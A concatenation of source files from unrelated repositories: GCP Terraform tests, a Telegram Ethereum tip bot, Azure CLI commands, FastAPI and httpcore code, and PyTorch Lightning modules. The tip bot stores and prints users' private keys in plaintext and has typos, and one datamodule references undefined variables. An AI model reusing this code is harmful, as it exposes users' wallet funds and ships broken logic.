def test_stateful_instance(plan_runner):
"Test stateful instances - instance."
stateful_config = (
'{'
'per_instance_config = {'
'instance-1 = {'
'stateful_disks = {'
'persistent-disk-1 = {'
'source = "test-disk",'
'mode = "READ_ONLY",'
'delete_rule= "NEVER",'
'},'
'},'
'metadata = {'
'foo = "bar"'
'},'
'update_config = {'
'minimal_action = "NONE",'
'most_disruptive_allowed_action = "REPLACE",'
'remove_instance_state_on_destroy = false,'
'},'
'},'
'},'
'mig_config = {'
'stateful_disks = {'
'persistent-disk-1 = {delete_rule="NEVER"}'
'}'
'}'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, stateful_config=stateful_config)
assert len(resources) == 2
instanceconfig = resources[0]
assert instanceconfig['type'] == 'google_compute_instance_group_manager'
instanceconfig = resources[1]
assert instanceconfig['type'] == 'google_compute_per_instance_config'
assert instanceconfig['values']['preserved_state'] == [{
'disk': [{
'device_name': 'persistent-disk-1',
'delete_rule': 'NEVER',
'source': 'test-disk',
'mode': 'READ_ONLY',
}],
'metadata': {
'foo': 'bar'
}
}]
assert instanceconfig['values']['minimal_action'] == 'NONE'
assert instanceconfig['values']['most_disruptive_allowed_action'] == 'REPLACE'
assert instanceconfig['values']['remove_instance_state_on_destroy'] == False
```
#### File: modules/iam_service_account/test_plan.py
```python
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_resources(plan_runner):
"Test service account resource."
_, resources = plan_runner(FIXTURES_DIR)
assert len(resources) == 1
resource = resources[0]
assert resource['type'] == 'google_service_account'
assert resource['values']['account_id'] == 'sa-one'
_, resources = plan_runner(FIXTURES_DIR, prefix='foo')
assert len(resources) == 1
resource = resources[0]
assert resource['values']['account_id'] == 'foo-sa-one'
def test_iam_roles(plan_runner):
"Test iam roles with one member."
iam = ('{"roles/iam.serviceAccountUser" = ["user:<EMAIL>"]}')
_, resources = plan_runner(FIXTURES_DIR, iam=iam)
assert len(resources) == 2
iam_resources = [r for r in resources
if r['type'] != 'google_service_account']
assert len(iam_resources) == 1
iam_resource = iam_resources[0]
assert iam_resource['type'] == 'google_service_account_iam_binding'
assert iam_resource['index'] == 'roles/iam.serviceAccountUser'
assert iam_resource['values']['role'] == 'roles/iam.serviceAccountUser'
assert iam_resource['values']['members'] == ["user:<EMAIL>"]
```
#### File: modules/vpc_sc/test_plan.py
```python
import os
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_create_policy(plan_runner):
"Test with auto-created policy."
_, resources = plan_runner(FIXTURES_DIR)
counts = {}
for r in resources:
n = f'{r["type"]}.{r["name"]}'
counts[n] = counts.get(n, 0) + 1
assert counts == {
'google_access_context_manager_access_level.basic': 2,
'google_access_context_manager_access_policy.default': 1,
'google_access_context_manager_service_perimeter.bridge': 2,
'google_access_context_manager_service_perimeter.regular': 2
}
def test_use_policy(plan_runner):
"Test with existing policy."
_, resources = plan_runner(FIXTURES_DIR, access_policy_create="null",
access_policy="accessPolicies/foobar")
counts = {}
for r in resources:
n = f'{r["type"]}.{r["name"]}'
counts[n] = counts.get(n, 0) + 1
assert counts == {
'google_access_context_manager_access_level.basic': 2,
'google_access_context_manager_service_perimeter.bridge': 2,
'google_access_context_manager_service_perimeter.regular': 2
}
``` |
{
"source": "00jw/Tip-bot",
"score": 2
} |
#### File: 00jw/Tip-bot/tip_bot.py
```python
import json
import traceback
from random import randint
from pymongo import MongoClient
from telegram import Bot
from web3 import Web3, HTTPProvider
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str, required=True, help="Config file")
parser.add_argument("-t", "--toothless", help="Does not send transactions", action="store_true")
parser.add_argument("-v", "--verbose", help="A more verbose output", action="store_true")
options = parser.parse_args()
with open(options.config) as conf_file:
conf = json.load(conf_file)
connectionString = conf['mongo']['connectionString'] + "/" + conf['mongo']['db']
http_provider = conf['web3']['provider']
bot_token = conf['telegram_bot']['bot_token']
dictionary = conf['dictionary']
donate_address = conf['donate_address']
class TipBot:
def __init__(self, w3):
if options.toothless:
print("Running toothless. Transactions will not be sent")
self.w3 = w3
print("Web3 Connected: %s " % self.w3.isConnected())
# Telegram bot initialization
self.bot = Bot(bot_token)
# Tip bot Initialization
client = MongoClient(connectionString)
db = client.get_database()
self.col_users = db['Users']
# get chat updates
self.new_message = self.wait_new_message()
self.message = self.new_message.message \
if self.new_message.message is not None \
else self.new_message.callback_query.message
self.text, _is_document = self.get_action(self.new_message)
self.message_text = str(self.text).lower()
print(self.text)
# init user data
try:
self.first_name = self.new_message.effective_user.first_name
self.username = self.new_message.effective_user.username
self.user_id = self.new_message.effective_user.id
except Exception as exc:
print(exc)
self.chat_id = self.message.chat.id
self.address = self.get_user_address()
split = self.message_text.split(' ')
if len(split) > 1:
args = split[1:]
else:
args = None
self.check_username_on_change()
self.action_processing(split[0], args)
"""
Get group username
"""
def get_group_username(self):
try:
return str(self.message.chat.username)
except:
return str(self.message.chat.id)
"""
Get User username
"""
def get_user_username(self):
try:
return str(self.message.from_user.username)
except:
if options.verbose:
print("Could not find username for:")
print(self.message)
return None
def wait_new_message(self):
while True:
updates = self.bot.get_updates()
if len(updates) > 0:
break
update = updates[0]
self.bot.get_updates(offset=update["update_id"] + 1)
return update
"""
Get user action | msg or callback
"""
@staticmethod
def get_action(message):
_is_document = False
if message['message'] is not None:
menu_option = message['message']['text']
_is_document = message['message']['document'] is not None
elif message["callback_query"] != 0:
menu_option = message["callback_query"]["data"]
return str(menu_option), _is_document
"""
Handle user actions
"""
def action_processing(self, cmd, args):
if "/start" == cmd:
_is_user_exists = self.col_users.find_one({"_id": self.user_id}) is not None
if not _is_user_exists:
public_key, pr_key = self.create_user_wallet()
self.col_users.insert({
"_id": self.user_id,
"UserName": self.username,
"Address": public_key,
"PrivateKey": pr_key,
"Balance": 0
})
self.bot.send_message(
self.user_id,
dictionary['welcome'] % public_key,
parse_mode='HTML'
)
elif "/tip" == cmd or "/send" == cmd:
if args is not None and len(args) >= 1:
if options.verbose:
print("self.message:")
print(self.message)
if self.message.reply_to_message is not None:
if options.verbose:
print("running tip_in_the_chat() with args:")
print(*args)
self.tip_in_the_chat(*args)
else:
if options.verbose:
print("running tip_user() with args:")
print(*args)
self.tip_user(*args)
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_parameters'],
parse_mode='HTML')
elif "/balance" == cmd:
balance = self.check_balance()
self.bot.send_message(
self.user_id,
dictionary['balance'] % balance,
parse_mode='HTML'
)
elif "/withdraw" == cmd:
try:
if args is not None and len(args) == 2:
self.withdraw_coins(*args)
else:
self.bot.send_message(
self.user_id,
dictionary['incorrect_withdraw'],
parse_mode='HTML'
)
except Exception as exc:
print(exc)
elif "/deposit" == cmd:
self.bot.send_message(
self.user_id,
dictionary['deposit'] % self.address,
parse_mode='HTML'
)
elif "/donate" == cmd:
if args is not None or len(args) == 1:
self.donate(*args)
else:
self.bot.send_message(
self.user_id,
dictionary['donate'],
parse_mode='HTML'
)
elif "/help" == cmd:
self.bot.send_message(
self.user_id,
dictionary['help'],
parse_mode='HTML'
)
elif "/backup" == cmd:
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
self.bot.send_message(
self.user_id,
dictionary['backup'] % _private_key,
parse_mode='HTML'
)
"""
Check username on change in the bot
"""
def check_username_on_change(self):
_is_username_in_db = self.col_users.find_one({"UserName": self.username}) is not None if self.username is not None else True
if not _is_username_in_db:
self.col_users.update(
{
"_id": self.user_id
},
{
"$set":
{
"UserName": self.username
}
}
)
"""
Create new wallet for new bot member
"""
def create_user_wallet(self):
acct = self.w3.eth.account.create('%s %s %s' % (self.user_id, self.first_name, randint(10000, 1000000)))
print(acct.address, acct.privateKey.hex())
return acct.address, acct.privateKey.hex()
"""
Check user balance
"""
def check_balance(self):
balance = self.w3.fromWei(self.w3.eth.getBalance(self.address), 'ether')
return balance
"""
Get user data
"""
def get_user_address(self):
try:
_user = self.col_users.find_one({"_id": self.user_id})
return _user['Address']
except Exception as exc:
print(exc)
return None, None
"""
Withdraw coins to address with params:
address
amount
"""
def withdraw_coins(self, address, amount):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
balance = self.check_balance()
if balance > amount:
to_address = self.w3.toChecksumAddress(address)
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': to_address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signex_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(self.user_id,
dictionary['withdrawal_result'] % (amount, address, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % balance,
parse_mode='HTML')
except Exception as exc:
print(exc)
"""
Donate to address
"""
def donate(self, amount):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
balance = self.check_balance()
if balance > amount:
to_address = self.w3.toChecksumAddress(donate_address)
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': to_address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signed_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(self.user_id,
dictionary['donate_result'] % (balance, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % balance,
parse_mode='HTML')
except Exception as exc:
print(exc)
"""
Tip user with params:
username
amount
"""
def tip_user(self, username, amount, coin=conf['currency']):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
username = username.replace('@', '')
_user = self.col_users.find_one({"UserName": username})
_is_username_exists = _user is not None
if not _is_username_exists:
self.bot.send_message(self.user_id,
dictionary['username_error'],
parse_mode='HTML')
return
self.send_tip(_user['_id'], _user['Address'], amount, coin)
except Exception as exc:
print(exc)
"""
Send a tip to user in the chat
"""
def tip_in_the_chat(self, amount, coin=conf['currency']):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
_user = self.col_users.find_one({"_id": self.message.reply_to_message.from_user.id})
self.send_tip(self.message.reply_to_message.from_user.id, _user['Address'], amount, coin)
except Exception as exc:
print(exc)
"""
Send tip to user with params
user_id - user identificator
addrees - user address
amount - amount of a tip
"""
def send_tip(self, user_id, address, amount, coin):
try:
balance = self.check_balance()
if balance > amount:
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})[
'PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signed_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(user_id,
dictionary['tip_recieved'] % (amount, coin, tx),
parse_mode='HTML')
self.bot.send_message(self.user_id,
dictionary['tip_sent'] % (amount, coin, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % (coin, balance),
parse_mode='HTML')
except Exception as exc:
print(exc)
def main():
w3 = Web3(HTTPProvider(http_provider))
while True:
try:
TipBot(w3=w3)
except Exception as e:
if "Timed out" not in str(e):
traceback.print_exc()
print(e)
if __name__ == '__main__':
main()
``` |
{
"source": "00Kai0/autorest.az",
"score": 2
} |
#### File: azext_managed_network/generated/custom.py
```python
from azure.cli.core.util import sdk_no_wait
def managed_network_mn_list(client,
resource_group_name=None,
top=None,
skiptoken=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name,
top=top,
skiptoken=skiptoken)
return client.list_by_subscription(top=top,
skiptoken=skiptoken)
def managed_network_mn_create(client,
resource_group_name,
managed_network_name,
location,
tags=None,
properties=None):
return client.create_or_update(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
location=location,
tags=tags,
properties=properties)
def managed_network_mn_update(client,
resource_group_name,
managed_network_name,
tags=None):
return client.begin_update(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
tags=tags)
def managed_network_mn_delete(client,
resource_group_name,
managed_network_name):
return client.begin_delete(resource_group_name=resource_group_name,
managed_network_name=managed_network_name)
def managed_network_mn_get_modify(client,
resource_group_name,
managed_network_name):
return client.get_modify(resource_group_name=resource_group_name,
managed_network_name=managed_network_name)
def managed_network_mn_scope_assignment_list(client,
scope):
return client.list(scope=scope)
def managed_network_mn_scope_assignment_show(client,
scope,
scope_assignment_name):
return client.get(scope=scope,
scope_assignment_name=scope_assignment_name)
def managed_network_mn_scope_assignment_create(client,
scope,
scope_assignment_name,
location,
assigned_managed_network=None):
return client.create_or_update(scope=scope,
scope_assignment_name=scope_assignment_name,
location=location,
assigned_managed_network=assigned_managed_network)
def managed_network_mn_scope_assignment_update(client,
scope,
scope_assignment_name,
location,
assigned_managed_network=None):
return client.create_or_update(scope=scope,
scope_assignment_name=scope_assignment_name,
location=location,
assigned_managed_network=assigned_managed_network)
def managed_network_mn_scope_assignment_delete(client,
scope,
scope_assignment_name):
return client.delete(scope=scope,
scope_assignment_name=scope_assignment_name)
def managed_network_mn_group_list(client,
resource_group_name,
managed_network_name,
top=None,
skiptoken=None):
return client.list_by_managed_network(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
top=top,
skiptoken=skiptoken)
def managed_network_mn_group_show(client,
resource_group_name,
managed_network_name,
group_name):
return client.get(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name)
def managed_network_mn_group_create(client,
resource_group_name,
managed_network_name,
group_name,
location,
management_groups=None,
subscriptions=None,
virtual_networks=None,
subnets=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name,
location=location,
management_groups=management_groups,
subscriptions=subscriptions,
virtual_networks=virtual_networks,
subnets=subnets)
def managed_network_mn_group_update(client,
resource_group_name,
managed_network_name,
group_name,
location,
management_groups=None,
subscriptions=None,
virtual_networks=None,
subnets=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name,
location=location,
management_groups=management_groups,
subscriptions=subscriptions,
virtual_networks=virtual_networks,
subnets=subnets)
def managed_network_mn_group_delete(client,
resource_group_name,
managed_network_name,
group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name)
def managed_network_managed_network_peering_policy_list(client,
resource_group_name,
managed_network_name,
top=None,
skiptoken=None):
return client.list_by_managed_network(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
top=top,
skiptoken=skiptoken)
def managed_network_managed_network_peering_policy_show(client,
resource_group_name,
managed_network_name,
policy_name):
return client.get(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name)
def managed_network_managed_network_peering_policy_hub_and_spoke_topology_create(client,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
properties = {}
properties['type'] = 'HubAndSpokeTopology'
properties['hub'] = hub
properties['spokes'] = spokes
properties['mesh'] = mesh
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name,
location=location,
properties=properties)
def managed_network_managed_network_peering_policy_mesh_topology_create(client,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
properties = {}
properties['type'] = 'MeshTopology'
properties['hub'] = hub
properties['spokes'] = spokes
properties['mesh'] = mesh
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name,
location=location,
properties=properties)
def managed_network_managed_network_peering_policy_hub_and_spoke_topology_update(instance,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
instance.type = 'HubAndSpokeTopology'
if hub is not None:
instance.hub = hub
if spokes is not None:
instance.spokes = spokes
if mesh is not None:
instance.mesh = mesh
return instance
def managed_network_managed_network_peering_policy_mesh_topology_update(instance,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
instance.type = 'MeshTopology'
if hub is not None:
instance.hub = hub
if spokes is not None:
instance.spokes = spokes
if mesh is not None:
instance.mesh = mesh
return instance
def managed_network_managed_network_peering_policy_delete(client,
resource_group_name,
managed_network_name,
policy_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name)
``` |
{
"source": "00Kai0/databases",
"score": 3
} |
#### File: databases/databases/interfaces.py
```python
import typing
from sqlalchemy.engine import RowProxy
from sqlalchemy.sql import ClauseElement
class DatabaseBackend:
async def connect(self) -> None:
raise NotImplementedError() # pragma: no cover
async def disconnect(self) -> None:
raise NotImplementedError() # pragma: no cover
def connection(self) -> "ConnectionBackend":
raise NotImplementedError() # pragma: no cover
class ConnectionBackend:
async def acquire(self) -> None:
raise NotImplementedError() # pragma: no cover
async def release(self) -> None:
raise NotImplementedError() # pragma: no cover
async def fetch_all(self, query: ClauseElement) -> typing.List[RowProxy]:
raise NotImplementedError() # pragma: no cover
async def fetch_one(self, query: ClauseElement) -> RowProxy:
raise NotImplementedError() # pragma: no cover
async def execute(self, query: ClauseElement, values: dict = None) -> None:
raise NotImplementedError() # pragma: no cover
async def execute_many(self, query: ClauseElement, values: list) -> None:
raise NotImplementedError() # pragma: no cover
async def iterate(
self, query: ClauseElement
) -> typing.AsyncGenerator[RowProxy, None]:
raise NotImplementedError() # pragma: no cover
# mypy needs async iterators to contain a `yield`
# https://github.com/python/mypy/issues/5385#issuecomment-407281656
yield True # pragma: no cover
def transaction(self) -> "TransactionBackend":
raise NotImplementedError() # pragma: no cover
class TransactionBackend:
async def start(self, is_root: bool) -> None:
raise NotImplementedError() # pragma: no cover
async def commit(self) -> None:
raise NotImplementedError() # pragma: no cover
async def rollback(self) -> None:
raise NotImplementedError() # pragma: no cover
``` |
{
"source": "00Kai0/fastapi",
"score": 3
} |
#### File: app/routers/items.py
```python
from fastapi import APIRouter
router = APIRouter()
@router.get("/", tags=["items"])
async def read_items():
return [{"name": "Item Foo"}, {"name": "item Bar"}]
@router.get("/{item_id}", tags=["items"])
async def read_item(item_id: str):
return {"name": "Fake Specific Item", "item_id": item_id}
``` |
{
"source": "00Kai0/httpcore",
"score": 2
} |
#### File: httpcore/tests/conftest.py
```python
import asyncio
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
@pytest.fixture
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
async def server():
config = Config(app=app, lifespan="off")
server = Server(config=config)
task = asyncio.ensure_future(server.serve())
try:
while not server.started:
await asyncio.sleep(0.0001)
yield server
finally:
server.should_exit = True
await task
@pytest.fixture
async def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
)
server = Server(config=config)
task = asyncio.ensure_future(server.serve())
try:
while not server.started:
await asyncio.sleep(0.0001)
yield server
finally:
server.should_exit = True
await task
```
#### File: httpcore/tests/test_utils.py
```python
import pytest
from httpx.utils import guess_json_utf
@pytest.mark.parametrize(
"encoding",
(
"utf-32",
"utf-8-sig",
"utf-16",
"utf-8",
"utf-16-be",
"utf-16-le",
"utf-32-be",
"utf-32-le",
),
)
def test_encoded(encoding):
data = "{}".encode(encoding)
assert guess_json_utf(data) == encoding
def test_bad_utf_like_encoding():
assert guess_json_utf(b"\x00\x00\x00\x00") is None
@pytest.mark.parametrize(
("encoding", "expected"),
(
("utf-16-be", "utf-16"),
("utf-16-le", "utf-16"),
("utf-32-be", "utf-32"),
("utf-32-le", "utf-32"),
),
)
def test_guess_by_bom(encoding, expected):
data = u"\ufeff{}".encode(encoding)
assert guess_json_utf(data) == expected
``` |
{
"source": "00Kai0/nativeauthenticator",
"score": 3
} |
#### File: nativeauthenticator/nativeauthenticator/orm.py
```python
import bcrypt
import re
from jupyterhub.orm import Base
from sqlalchemy import Boolean, Column, Integer, String, LargeBinary
from sqlalchemy.orm import validates
class UserInfo(Base):
__tablename__ = 'users_info'
id = Column(Integer, primary_key=True, autoincrement=True)
username = Column(String, nullable=False)
password = Column(LargeBinary, nullable=False)
is_authorized = Column(Boolean, default=False)
email = Column(String)
@classmethod
def find(cls, db, username):
"""Find a user info record by name.
Returns None if not found"""
return db.query(cls).filter(cls.username == username).first()
def is_valid_password(self, password):
"""Checks if a password passed matches the
password stored"""
encoded_pw = bcrypt.hashpw(password.encode(), self.password)
return encoded_pw == self.password
@classmethod
def change_authorization(cls, db, username):
user = db.query(cls).filter(cls.username == username).first()
user.is_authorized = not user.is_authorized
db.commit()
return user
@validates('email')
def validate_email(self, key, address):
if not address:
return
assert re.match(r"^[A-Za-z0-9\.\+_-]+@[A-Za-z0-9\._-]+\.[a-zA-Z]*$",
address)
return address
``` |
{
"source": "00krishna-research/lightning-graph-graphsage",
"score": 2
} |
#### File: src/models/graphsage_model.py
```python
from typing import Any, List, NamedTuple
from torchmetrics import MaxMetric
import torch
from torch import Tensor
import torch.nn.functional as F
from torch.nn import ModuleList, BatchNorm1d
from torch_sparse import SparseTensor
from torchmetrics import Accuracy
from pytorch_lightning import LightningModule
import torch_geometric.transforms as T
from torch_geometric.nn import SAGEConv
class Batch(NamedTuple):
x: Tensor
y: Tensor
adjs_t: List[SparseTensor]
class GraphSAGELitModel(LightningModule):
def __init__(self,
in_channels: int,
out_channels: int,
hidden_channels: int = 256,
num_layers: int = 2,
dropout: float = 0.5,
lr: float = 0.001,
weight_decay: float = 0.0005):
super().__init__()
self.save_hyperparameters()
self.dropout = dropout
self.convs = ModuleList()
self.convs.append(SAGEConv(in_channels, hidden_channels))
for _ in range(num_layers - 2):
self.convs.append(SAGEConv(hidden_channels, hidden_channels))
self.convs.append(SAGEConv(hidden_channels, out_channels))
self.bns = ModuleList()
for _ in range(num_layers - 1):
self.bns.append(BatchNorm1d(hidden_channels))
self.train_acc = Accuracy()
self.val_acc = Accuracy()
self.test_acc = Accuracy()
# for logging best so far validation accuracy
self.val_acc_best = MaxMetric()
def forward(self, x: Tensor, adjs_t: List[SparseTensor]) -> Tensor:
for i, adj_t in enumerate(adjs_t):
x = self.convs[i]((x, x[:adj_t.size(0)]), adj_t)
if i < len(adjs_t) - 1:
x = self.bns[i](x)
x = x.relu_()
x = F.dropout(x, p=self.dropout, training=self.training)
return x
def training_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
train_loss = F.cross_entropy(y_hat, y)
self.train_acc(y_hat.softmax(dim=-1), y)
self.log('train_acc', self.train_acc, prog_bar=True, on_step=False,
on_epoch=True)
return train_loss
def validation_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
self.val_acc(y_hat.softmax(dim=-1), y)
self.log('val_acc', self.val_acc, prog_bar=True, on_step=False,
on_epoch=True)
def test_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
self.test_acc(y_hat.softmax(dim=-1), y)
self.log('test_acc', self.test_acc, prog_bar=True, on_step=False,
on_epoch=True)
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(),
lr=self.hparams.lr,
weight_decay=self.hparams.weight_decay)
``` |
{
"source": "00krishna-research/lightning-nlp-tweet-classification",
"score": 2
} |
#### File: src/datamodules/disastertweet_datamodule.py
```python
from typing import Optional, Tuple
import torch
from pytorch_lightning import LightningDataModule
from torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split
from torchvision.datasets import MNIST
from torchvision.transforms import transforms
import string
from collections import Counter
from typing import Optional
import numpy as np
import pandas as pd
import pytorch_lightning as pl
import torch
import torch.utils.data
from torch.utils.data import Dataset
class DisasterTweetsDataModule(pl.LightningDataModule):
def __init__(self,
tweets_data_path,
batch_size,
num_workers=0,
pin_memory=True):
super().__init__()
self.num_workers = num_workers
self.tweets_data_path = tweets_data_path
self.embeddings_path = embeddings_path
self.batch_size = batch_size
self.pin_memory = pin_memory
def setup(self, stage: Optional[str] = None):
tweets_df = pd.read_csv(self.tweets_data_path)
def train_dataloader(self):
return DataLoader(
self.train_ds,
batch_size=self.batch_size,
shuffle=True,
drop_last=True,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
def val_dataloader(self):
return DataLoader(
self.val_ds,
batch_size=self.batch_size,
shuffle=False,
drop_last=False,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
def test_dataloader(self):
return DataLoader(
self.test_ds,
batch_size=self.batch_size,
shuffle=False,
drop_last=False,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
```
#### File: src/datamodules/scratch_disasterdata.py
```python
import collections
import numpy as np
import pandas as pd
import re
import spacy
from torchtext.legacy.data import Field
from torchtext.data import Field, TabularDataset, BucketIterator
from typing import Optional, Tuple
import torch
from pytorch_lightning import LightningDataModule
from torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split
from torchvision.datasets import MNIST
from torchvision.transforms import transforms
import string
from typing import Optional
import pandas as pd
import pytorch_lightning as pl
TRAINPCT = 0.8
TESTPCT = 0.2
# Read raw data
tweets = pd.read_csv("data/train.csv", header=0)
# Create training/test/validation split
def train_test_val_split(x, trainpct=0.8):
r1, r2 = np.random.random(2)
if r1 <= trainpct:
res = "train"
else:
res = "test"
if res=="train" and r2 <= trainpct:
res = "train"
elif res=="train" and r2 > trainpct:
res = "val"
else:
pass
return res
# Preprocess the reviews
def preprocess_text(text):
text = ' '.join(word.lower() for word in text.split(" "))
text = re.sub(r"([.,!?])", r" \1 ", text)
text = re.sub(r"[^a-zA-Z.,!?]+", r" ", text)
return text
tweets["split"] = 0
tweets["split"] = tweets.split.apply(train_test_val_split)
tweets["text"] = tweets.text.apply(preprocess_text)
# Write munged data to CSV
tweets.to_csv("output.csv", index=False)
spacy_en = spacy.load("en")
def tokenize(text):
return [tok.text for tok in spacy_en.tokenizer(text)]
quote = Field(sequential=True, use_vocab=True, tokenize=tokenize, lower=True)
score = Field(sequential=False, use_vocab=False)
fields = {"quote": ("q", quote), "score": ("s", score)}
train_data, test_data = TabularDataset.splits(
path="mydata", train="train.json", test="test.json", format="json", fields=fields
)
```
#### File: src/datamodules/scratch_torchtext2.py
```python
import torchtext
import torch
from torchtext.datasets import IMDB
from torchtext.data.utils import get_tokenizer
from collections import Counter
from torchtext.vocab import Vocab
from torch.utils.data import DataLoader
